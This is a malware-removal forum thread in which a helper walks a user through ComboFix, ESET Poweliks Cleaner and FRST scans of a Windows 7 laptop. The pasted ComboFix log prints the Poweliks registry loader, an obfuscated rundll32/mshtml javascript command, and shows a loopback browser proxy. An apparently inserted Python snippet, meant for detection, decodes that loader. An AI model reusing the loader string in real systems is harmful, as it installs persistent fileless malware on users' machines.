Error: (01/24/2015 05:14:07 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (01/24/2015 04:52:31 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The risdpcie service failed to start due to the following error:
%%193

Error: (01/24/2015 04:52:31 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Total Defense Common Scheduler Service service failed to start due to the following error:
%%2

Error: (01/24/2015 04:28:51 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (01/24/2015 04:18:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The risdpcie service failed to start due to the following error:
%%193

Error: (01/24/2015 04:18:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Total Defense Common Scheduler Service service failed to start due to the following error:
%%2

Error: (01/24/2015 04:18:21 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Browser System Enahncer service to connect.

Error: (01/24/2015 04:15:28 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {995C996E-D918-4A8C-A302-45719A6F4EA7}

Microsoft Office Sessions:
=========================

==================== Memory info ===========================

Processor: Intel® Core i5 CPU M 560 @ 2.67GHz
Percentage of memory in use: 37%
Total physical RAM: 3509.86 MB
Available physical RAM: 2206.82 MB
Total Pagefile: 7018.01 MB
Available Pagefile: 5457.46 MB
Total Virtual: 2047.88 MB
Available Virtual: 1900.29 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:297.94 GB) (Free:201.3 GB) NTFS
Drive d: (RCT3) (CDROM) (Total:0.67 GB) (Free:0 GB) CDFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 298.1 GB) (Disk ID: B3AF73EC)
Partition 1: (Active) - (Size=157 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=297.9 GB) - (Type=07 NTFS)

==================== End Of Log ============================


Hello and welcome!

I'm Radek and I'll try to help you with your issue.

Before we start please note the following:

  • Analysis and research take some time, and sometimes real life gets in the way, so please be patient.
  • Limit your internet access to posting here; some infections just wait to steal typed-in passwords.
  • Don't run any scripts or tools on your own; unsupervised usage may cause more harm than good.
  • Paste the logs in your posts; attachments make my work harder and more complicated.
  • Stay with me to the end; the absence of symptoms doesn't mean that your machine is fully operational.
  • Note that we may live in totally different time zones, which may cause some delays between answers.
I can't foresee everything, so if anything unexpected happens, please stop and inform me!

There are no silly questions. Never be afraid to ask if in doubt!

Rules and policies

We won't support any piracy.

That being said, if any evidence of an illegal OS, software, cracks/keygens or anything else of that kind is revealed, any further assistance will be suspended. If you are aware that there is this kind of stuff on your machine, remove it before proceeding!

The same applies to any use of P2P software: uTorrent, BitTorrent, Vuze, Kazaa, Ares... We don't provide any help for P2P, except for their removal. All P2P software has to be uninstalled or at least fully disabled before proceeding!

Failure to follow these guidelines will result in closing your topic and withdrawing any assistance.


Scan with ComboFix

This is a very powerful tool that should be used only if advised by a Malware Expert.

Do not run ComboFix on your own!

Referring to this instruction, please download ComboFix by sUBs and save it to your desktop.

Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.

If you are a user of CD emulation software (like Daemon Tools or Alcohol), also disable it for the cleaning process - instructions here.

  • Right-click on the ComboFix icon and select Run as Administrator to start the tool.
  • Accept the disclaimer and agree if prompted to install Recovery Console.
  • Do not take any actions while ComboFix goes through your System - it may cause it to stall!
  • This scan may take some time!
  • When finished - it will display a logfile (located also on your main drive, usually C:\ComboFix.txt).
Include that log in your next reply.

If you encounter any issues with your internet connection after running ComboFix, please visit this link.

If an error about an operation on a key marked for deletion appears after running the tool, please reboot your machine.

Don't forget to re-enable your previously switched-off protection software!


Thanks Radek!

Here is my Combofix log:

ComboFix 15-01-22.02 - User 01/24/2015  23:34:46.2.4 - x86
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.3510.2153 [GMT -6:00]
Running from: c:\users\User\Desktop\Malware stuff\ComboFix\ComboFix.exe
AV: AVG AntiVirus Free Edition 2015 *Disabled/Updated* {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
SP: AVG AntiVirus Free Edition 2015 *Disabled/Updated* {B5F5C120-2089-702E-0001-553BB0D5A664}
SP: Spybot - Search and Destroy *Enabled/Updated* {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct:
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}
   <NO NAME> REG_SZ          Thumbnail Cache Class Factory for Out of Proc Server
   AppID REG_SZ          {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32
   <NO NAME> REG_EXPAND_SZ   %SYSTEMROOT%\system32\thumbcache.dll
   ThreadingModel REG_SZ          Apartment
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32
   a REG_SZ          [encoded script value omitted from log]
   <NO NAME> REG_SZ          rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
.
(((((((((((((((((((((((((   Files Created from 2014-12-25 to 2015-01-25  )))))))))))))))))))))))))))))))
.
.
2015-01-25 05:43 . 2015-01-25 05:43 -------- d-----w- c:\users\Default\AppData\Local\temp
2015-01-15 03:04 . 2015-01-24 23:33 -------- d-----w- C:\FRST
2015-01-15 01:59 . 2015-01-24 19:35 -------- d--h--w- c:\programdata\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
2015-01-14 04:17 . 2014-12-12 05:11 3971512 ----a-w- c:\windows\system32\ntkrnlpa.exe
2015-01-14 04:17 . 2014-12-12 05:11 3916728 ----a-w- c:\windows\system32\ntoskrnl.exe
2015-01-14 03:13 . 2014-12-19 01:34 116224 ----a-w- c:\windows\system32\drivers\mrxdav.sys
2015-01-14 03:07 . 2014-12-19 02:43 164864 ----a-w- c:\windows\system32\profsvc.dll
2015-01-14 03:07 . 2014-12-11 17:47 56320 ----a-w- c:\windows\system32\TSWbPrxy.exe
2015-01-14 03:07 . 2014-12-06 03:50 242688 ----a-w- c:\windows\system32\nlasvc.dll
2015-01-12 15:58 . 2015-01-12 15:58 -------- d-----w- c:\users\Default\AppData\Roaming\TuneUp Software
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2015-01-24 22:26 . 2014-08-14 02:31 114904 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2015-01-22 19:07 . 2013-02-11 18:09 71344 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2015-01-22 19:07 . 2013-02-11 18:09 701616 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-12-13 03:33 . 2014-12-17 19:55 115712 ----a-w- c:\windows\system32\ieUnatt.exe
2014-12-09 03:25 . 2014-12-09 03:25 208152 ----a-w- c:\windows\system32\drivers\avgidsdriverx.sys
2014-12-04 04:38 . 2014-12-16 03:49 337920 ----a-w- c:\windows\system32\generaltel.dll
2014-12-04 04:38 . 2014-12-16 03:49 610304 ----a-w- c:\windows\system32\invagent.dll
2014-12-04 04:38 . 2014-12-16 03:49 315392 ----a-w- c:\windows\system32\devinv.dll
2014-12-04 04:38 . 2014-12-16 03:49 728576 ----a-w- c:\windows\system32\appraiser.dll
2014-12-04 04:38 . 2014-12-16 03:49 159744 ----a-w- c:\windows\system32\aepic.dll
2014-12-04 04:38 . 2014-12-16 03:49 202752 ----a-w- c:\windows\system32\aepdu.dll
2014-12-04 04:34 . 2014-12-16 03:49 873984 ----a-w- c:\windows\system32\aeinv.dll
2014-12-01 23:28 . 2014-12-16 03:49 1160872 ----a-w- c:\windows\system32\aitstatic.exe
2014-11-22 02:20 . 2014-12-16 03:48 2724864 ----a-w- c:\windows\system32\mshtml.tlb
2014-11-22 02:20 . 2014-12-16 03:49 4096 ----a-w- c:\windows\system32\ieetwcollectorres.dll
2014-11-22 02:07 . 2014-12-16 03:49 501248 ----a-w- c:\windows\system32\vbscript.dll
2014-11-22 02:07 . 2014-12-16 03:48 62464 ----a-w- c:\windows\system32\iesetup.dll
2014-11-22 02:06 . 2014-12-16 03:49 47616 ----a-w- c:\windows\system32\ieetwproxystub.dll
2014-11-22 02:05 . 2014-12-16 03:49 64000 ----a-w- c:\windows\system32\MshtmlDac.dll
2014-11-22 01:55 . 2014-12-16 03:49 102912 ----a-w- c:\windows\system32\ieetwcollector.exe
2014-11-22 01:54 . 2014-12-16 03:49 620032 ----a-w- c:\windows\system32\jscript9diag.dll
2014-11-22 01:48 . 2014-12-16 03:49 667648 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2014-11-22 01:40 . 2014-12-16 03:49 60416 ----a-w- c:\windows\system32\JavaScriptCollectionAgent.dll
2014-11-22 01:29 . 2014-12-16 03:49 4299264 ----a-w- c:\windows\system32\jscript9.dll
2014-11-22 01:22 . 2014-12-16 03:48 2052096 ----a-w- c:\windows\system32\inetcpl.cpl
2014-11-22 01:21 . 2014-12-16 03:49 1155072 ----a-w- c:\windows\system32\mshtmlmedia.dll
2014-11-22 01:00 . 2014-12-16 03:49 1888256 ----a-w- c:\windows\system32\wininet.dll
2014-11-21 12:14 . 2014-08-14 02:31 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-11-21 12:14 . 2014-08-14 02:31 75480 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-11-21 12:14 . 2014-08-14 02:31 23256 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-11-19 03:41 . 2014-11-19 03:41 154904 ----a-w- c:\windows\system32\drivers\avgidshx.sys
2014-11-18 20:56 . 2014-11-18 20:56 1202848 ----a-w- c:\windows\system32\FM20.DLL
2014-11-16 02:32 . 2014-11-14 21:02 62576 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{CA52C3C8-E202-40F5-AF46-CE139ACCD8CC}\offreg.dll
2014-11-11 02:44 . 2014-12-16 03:49 1230336 ----a-w- c:\windows\system32\WindowsCodecs.dll
2014-11-11 02:44 . 2014-12-16 03:49 186880 ----a-w- c:\windows\system32\pku2u.dll
2014-11-11 02:44 . 2014-12-16 03:49 550912 ----a-w- c:\windows\system32\kerberos.dll
2014-11-11 01:32 . 2014-12-16 03:49 74752 ----a-w- c:\windows\system32\drivers\tdx.sys
2014-11-08 02:45 . 2014-12-16 03:48 2048 ----a-w- c:\windows\system32\tzres.dll
2014-11-05 03:33 . 2014-11-05 03:33 0 ----a-w- c:\users\User\AppData\Roaming\qkmrs.dll
2014-10-30 01:45 . 2014-12-16 03:48 155136 ----a-w- c:\windows\system32\charmap.exe
2014-10-28 22:28 . 2014-10-28 22:28 96680 ----a-w- c:\windows\system32\WindowsAccessBridge.dll
2014-10-28 11:35 . 2013-02-09 00:27 229000 ------w- c:\windows\system32\MpSigStub.exe
2008-10-28 19:41 . 2013-10-16 20:14 238896 ----a-w- c:\program files\mozilla firefox\plugins\CrazyTalk4Native.dll
2008-10-28 19:41 . 2013-10-16 20:14 210320 ----a-w- c:\program files\mozilla firefox\plugins\ctdomemhelper.dll
2008-10-28 19:41 . 2013-10-16 20:14 83248 ----a-w- c:\program files\mozilla firefox\plugins\ctframeplayerobject.dll
2008-10-28 19:41 . 2013-10-16 20:14 431512 ----a-w- c:\program files\mozilla firefox\plugins\ctplayerobject.dll
2008-10-28 19:41 . 2013-10-16 20:14 464176 ----a-w- c:\program files\mozilla firefox\plugins\imagickrt.dll
2008-10-28 19:41 . 2013-10-16 20:14 144688 ----a-w- c:\program files\mozilla firefox\plugins\rlcontentclass.dll
2008-10-28 19:41 . 2013-10-16 20:14 210224 ----a-w- c:\program files\mozilla firefox\plugins\RLMusicPacker.dll
2008-10-28 19:41 . 2013-10-16 20:14 111920 ----a-w- c:\program files\mozilla firefox\plugins\RLMusicUnpacker.dll
2008-10-28 19:41 . 2013-10-16 20:14 218416 ----a-w- c:\program files\mozilla firefox\plugins\RLVoicePacker.dll
2008-10-28 19:41 . 2013-10-16 20:14 173360 ----a-w- c:\program files\mozilla firefox\plugins\RLVoiceUnpacker.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive1]
@="{F241C880-6982-4CE5-8CF7-7085BA96DA5A}"
[HKEY_CLASSES_ROOT\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}]
2013-10-21 21:58 220632 ----a-w- c:\users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveShell.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive2]
@="{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}"
[HKEY_CLASSES_ROOT\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}]
2013-10-21 21:58 220632 ----a-w- c:\users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveShell.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive3]
@="{BBACC218-34EA-4666-9D7A-C78F2274A524}"
[HKEY_CLASSES_ROOT\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}]
2013-10-21 21:58 220632 ----a-w- c:\users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveShell.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DellSystemDetect"="c:\users\User\AppData\Local\Apps\2.0\NLO15GEQ.9JN\QY5WA4B1.38M\dell..tion_e30b47f5d4a30e9e_0005.000c_1df9a4898fae00de\DellSystemDetect.exe" [2014-11-04 264488]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2012-01-11 142616]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2012-01-11 177432]
"Persistence"="c:\windows\system32\igfxpers.exe" [2012-01-11 177944]
"Apoint"="c:\program files\DellTPad\Apoint.exe" [2010-06-04 292208]
"Dell Webcam Central"="c:\program files\Dell Webcam\Dell Webcam Central\WebcamDell2.exe" [2009-06-24 409744]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2014-09-26 271744]
"AVG_UI"="c:\program files\AVG\AVG2015\avgui.exe" [2014-12-18 3667472]
"SDTray"="c:\program files\Spybot - Search & Destroy 2\SDTray.exe" [2014-06-24 4101576]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
OemReset.lnk - c:\windows\options\OemReset.exe /audit [2013-2-11 521616]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ    autocheck autochk *\0\0sdnclean.exe
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]
@="Driver"
.
R2 AVGIDSAgent;AVGIDSAgent;c:\program files\AVG\AVG2015\avgidsagent.exe [2014-12-18 3432976]
R2 ccSchedulerSVC;Total Defense Common Scheduler Service;c:\program files\Total Defense\Internet Security Suite\ccschedulersvc.exe [x]
R2 risdpcie;risdpcie;c:\windows\system32\DRIVERS\RISDPE64.SYS [2009-10-29 79360]
R3 btwampfl;btwampfl;c:\windows\system32\DRIVERS\btwampfl.sys [2013-10-03 144600]
R3 CtAudDrv;Provides advanced audio effects for audio devices.;c:\windows\system32\Drivers\CtAudDrv.sys [2009-05-28 134144]
R3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys [2010-11-20 62464]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe [2014-11-22 102912]
R3 netw5v32;Intel® Wireless WiFi Link 5000 Series Adapter Driver for Windows Vista 32 Bit;c:\windows\system32\DRIVERS\netw5v32.sys [2009-07-13 4231168]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys [2012-08-23 14848]
R3 SrvHsfHDA;SrvHsfHDA;c:\windows\system32\DRIVERS\VSTAZL3.SYS [2009-07-13 207360]
R3 SrvHsfV92;SrvHsfV92;c:\windows\system32\DRIVERS\VSTDPV3.SYS [2009-07-13 980992]
R3 SrvHsfWinac;SrvHsfWinac;c:\windows\system32\DRIVERS\VSTCNXT3.SYS [2009-07-13 661504]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys [2012-08-23 49664]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys [2012-08-23 27136]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe [2013-02-09 1343400]
S0 AVGIDSHX;AVGIDSHX;c:\windows\system32\DRIVERS\avgidshx.sys [2014-11-19 154904]
S0 Avglogx;AVG Logging Driver;c:\windows\system32\DRIVERS\avglogx.sys [2014-07-18 230680]
S0 Avgrkx86;AVG Anti-Rootkit Driver;c:\windows\system32\DRIVERS\avgrkx86.sys [2014-06-19 27416]
S0 stdcfltn;Disk Class Filter Driver for Accelerometer;c:\windows\system32\DRIVERS\stdcfltn.sys [2011-07-16 17904]
S1 Avgdiskx;AVG Disk Driver;c:\windows\system32\DRIVERS\avgdiskx.sys [2014-06-19 121624]
S1 AVGIDSDriver;AVGIDSDriver;c:\windows\system32\DRIVERS\avgidsdriverx.sys [2014-12-09 208152]
S1 AVGIDSShim;AVGIDSShim;c:\windows\system32\DRIVERS\avgidsshimx.sys [2014-06-19 21272]
S1 Avgldx86;AVG AVI Loader Driver;c:\windows\system32\DRIVERS\avgldx86.sys [2014-08-29 192792]
S1 Avgtdix;AVG TDI Driver;c:\windows\system32\DRIVERS\avgtdix.sys [2014-10-10 200984]
S2 avgwd;AVG WatchDog;c:\program files\AVG\AVG2015\avgwdsvc.exe [2014-12-18 298080]
S2 BcmBtRSupport;Bluetooth Driver Management Service;c:\windows\system32\BtwRSupportService.exe [2013-10-03 1678040]
S2 SDScannerService;Spybot-S&D 2 Scanner Service;c:\program files\Spybot - Search & Destroy 2\SDFSSvc.exe [2014-06-24 1738168]
S2 SDUpdateService;Spybot-S&D 2 Updating Service;c:\program files\Spybot - Search & Destroy 2\SDUpdSvc.exe [2014-06-27 2088408]
S2 SDWSCService;Spybot-S&D 2 Security Center Service;c:\program files\Spybot - Search & Destroy 2\SDWSCSvc.exe [2014-04-25 171928]
S3 Acceler;Accelerometer Service;c:\windows\system32\DRIVERS\accelern.sys [2011-10-03 44144]
S3 bcbtums;Bluetooth USB LD Filter;c:\windows\system32\drivers\bcbtums.sys [2013-10-03 174936]
S3 CtClsFlt;Creative Camera Class Upper Filter Driver;c:\windows\system32\DRIVERS\CtClsFlt.sys [2009-06-15 143968]
S3 cvusbdrv;Broadcom USH CV;c:\windows\system32\Drivers\cvusbdrv.sys [2008-07-23 32808]
S3 e1kexpress;Intel® PRO/1000 PCI Express Network Connection Driver K;c:\windows\system32\DRIVERS\e1k6232.sys [2010-04-06 224424]
S3 Impcd;Impcd;c:\windows\system32\DRIVERS\Impcd.sys [2010-02-27 132480]
S3 NETwNs32;___ Intel® Wireless WiFi Link 5000 Series Adapter Driver for Windows 7 - 32 Bit;c:\windows\system32\DRIVERS\Netwsn00.sys [2012-06-03 10364416]
.
.
Contents of the 'Scheduled Tasks' folder
.
2015-01-25 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2013-02-11 19:07]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.foxnews.com/
mStart Page = www.google.com
uInternet Settings,ProxyOverride = <-loopback>
uInternet Settings,ProxyServer = http=127.0.0.1:49329;https=127.0.0.1:49329
Trusted Zone: dell.com
TCP: DhcpNameServer = 192.168.0.1
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (Read) (RestrictedCode)
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_16_0_0_287_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_16_0_0_287_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2015-01-24  23:45:28
ComboFix-quarantined-files.txt  2015-01-25 05:45
ComboFix2.txt  2015-01-24 22:11
.
Pre-Run: 215,644,499,968 bytes free
Post-Run: 215,607,930,880 bytes free
.
- - End Of File - - CBE45E29BEF2BA49CCF3C2F8A5FBEF08
5C616939100B85E558DA92B899A0FC36
 

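The unnamed Run value under Reg Loading Points above (rundll32.exe launching a javascript: URL through mshtml.dll) and the 127.0.0.1:49329 ProxyServer entry in the Supplementary Scan are the two Poweliks traces worth recognising in a log. As an added example, not code from this thread or from ComboFix/FRST, the Python below flags the loader, reverses the charCodeAt()-1 obfuscation to expose the registry key the loader reads (the same Classes\CLSID\{AB8902B4-...}\localserver32 key the log lists under LOCKED REGISTRY KEYS), and flags loopback proxy entries; the function names are my own and the sample strings are copied from the log lines above.

```python
"""Flag and deobfuscate Poweliks-style autorun and proxy values from a scan log.

Added example, not code from this thread, ComboFix or FRST. Function names are
my own; the sample strings are copied from the log lines posted above.
"""
import re
from typing import List, Optional

# The loader ComboFix printed under "Reg Loading Points": rundll32.exe is made
# to load mshtml.dll and run inline JavaScript from a javascript: URL.
_LOADER_RE = re.compile(
    r'rundll32(?:\.exe)?\s+javascript:"\\\.\.\\mshtml\.dll,RunHTMLApplication\s*";',
    re.IGNORECASE,
)

# eval("<payload>".replace(/./g, function(_){return String.fromCharCode(_.charCodeAt()-N);}))
# The %20 is how the log captured the space after "return".
_EVAL_SHIFT_RE = re.compile(
    r'eval\("(?P<payload>[^"]*)"\.replace\(/\./g,\s*function\(_\)\{return(?:\s|%20)*'
    r'String\.fromCharCode\(_\.charCodeAt\(\)-(?P<shift>\d+)\);\}\)\)',
    re.IGNORECASE,
)

_REGREAD_RE = re.compile(r"RegRead\('([^']*)'\)", re.IGNORECASE)

# A proxy pointing at one of these hosts routes browser traffic through a
# process on the infected machine itself.
_LOOPBACK = {"127.0.0.1", "localhost", "::1", "[::1]"}


def decode_shifted(payload: str, shift: int = 1) -> str:
    """Undo the charCodeAt()-shift obfuscation by moving every character
    `shift` code points down (the captured value used a shift of 1)."""
    return "".join(chr(ord(c) - shift) for c in payload)


def analyse_run_value(value: str) -> Optional[dict]:
    """Return findings for one Run-key value string, or None when it does not
    contain the rundll32 / mshtml.dll,RunHTMLApplication loader."""
    if not _LOADER_RE.search(value):
        return None
    findings = {
        "loader": "rundll32.exe javascript: -> mshtml.dll,RunHTMLApplication",
        "decoded": None,
        "regread_key": None,
    }
    m = _EVAL_SHIFT_RE.search(value)
    if m:
        decoded = decode_shifted(m.group("payload"), int(m.group("shift")))
        findings["decoded"] = decoded
        k = _REGREAD_RE.search(decoded)
        if k:
            # JScript escapes backslashes as \\ ; collapse them to the real key path.
            findings["regread_key"] = k.group(1).replace("\\\\", "\\")
    return findings


def analyse_proxy_value(value: str) -> List[str]:
    """Return 'scheme->host:port' for every proxy entry that targets loopback."""
    hits = []
    for item in filter(None, value.split(";")):
        scheme, endpoint = item.split("=", 1) if "=" in item else ("*", item)
        host = endpoint.rsplit(":", 1)[0] if ":" in endpoint else endpoint
        if host.strip().lower() in _LOOPBACK:
            hits.append(f"{scheme.strip()}->{endpoint.strip()}")
    return hits


# Sample inputs copied from the ComboFix log in the thread (the CLSID tail in
# the captured payload is reproduced exactly as the log shows it).
RUN_VALUE = (
    'rundll32.exe javascript:"\\..\\mshtml.dll,RunHTMLApplication ";'
    'eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)('
    'XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.'
    'c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_)'
    '{return%20String.fromCharCode(_.charCodeAt()-1);}))'
)
PROXY_VALUE = "http=127.0.0.1:49329;https=127.0.0.1:49329"

if __name__ == "__main__":
    print(analyse_run_value(RUN_VALUE))
    print(analyse_proxy_value(PROXY_VALUE))
```

Running it prints the decoded JScript (a document.write of whatever WScript.Shell reads from the hidden CLSID key) and the two loopback proxy hits; on a live host the same functions would be fed the values read from the HKCU Run and Internet Settings keys.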

Nope, Poweliks is still sitting there.

Scan with ESET Poweliks Cleaner

Please download ESET Poweliks Cleaner and save the file to your desktop.

  • Right-click on the tool's icon and select Run as Administrator to start the tool.
  • If the tool finds Poweliks, you will be prompted: Win32/Poweliks found in your system.
  • Press Y to continue the removal.
  • You should be notified that the tool successfully removed the threat from your system.
  • The tool will also produce a logfile on your desktop, named ESETPoweliksCleaner_Date.Time.
Please attach this file to your next reply. To do so:

- after typing in your message, click More reply options instead of Post.

- below the post preview and the post editor, you should be able to see Attach files option - please click Choose file.

- in the pop-up window navigate to the desktop. Choose the one named ESETPoweliksCleaner_Date.Time.log and attach it.

If the file is too big to attach (it may happen), then please host it on a Dropbox account or a site like mediafire.com, providing me the link to the uploaded file.


Radek,
Thank you for these quick replies! 

I keep having to go into Internet Explorer Tools...Internet Options...Security Tab...Custom Level...then click the Allow Downloads.  For some reason that option keeps getting reset back to 'don't allow downloads'.  I wonder if that is from the virus or some other setting I have?

 

Ok, on to ESET.

I downloaded it, ran it as administrator and it found POWELIKS and asked me if I wanted to remove it.  I said YES and then it said I needed to restart.  I restarted and went here to reply to this post.

 

So far, my CPU is at 0 or 1 percent and physical memory is at 33%.  So, that looks good. Although, I do have two iexplorer.exe processes open.

 

Attached you should find my ESET log file.

 

ESETPoweliksCleaner.exe_20150125.113914.8688.log


Hi :)

Looks like we were able to hunt down and kill the naughty one. Let's see where we are here.

Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool.

  • Right-click on the FRST icon and select Run as Administrator to start the tool.

    > XP users click run after receipt of Windows Security Warning - Open File.

    > 8 users will be prompted about Windows SmartScreen protection - click More information and Run.

  • Make sure that the Addition option is checked.
  • Press the Scan button and wait.
  • The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.
Please include their content in your next reply.

Thanks Radek...here are the log files.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 24-01-2015 01
Ran by User (administrator) on USER-PC on 26-01-2015 16:43:54
Running from C:\Users\User\Desktop\Malware stuff
Loaded Profiles: User (Available profiles: User)
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
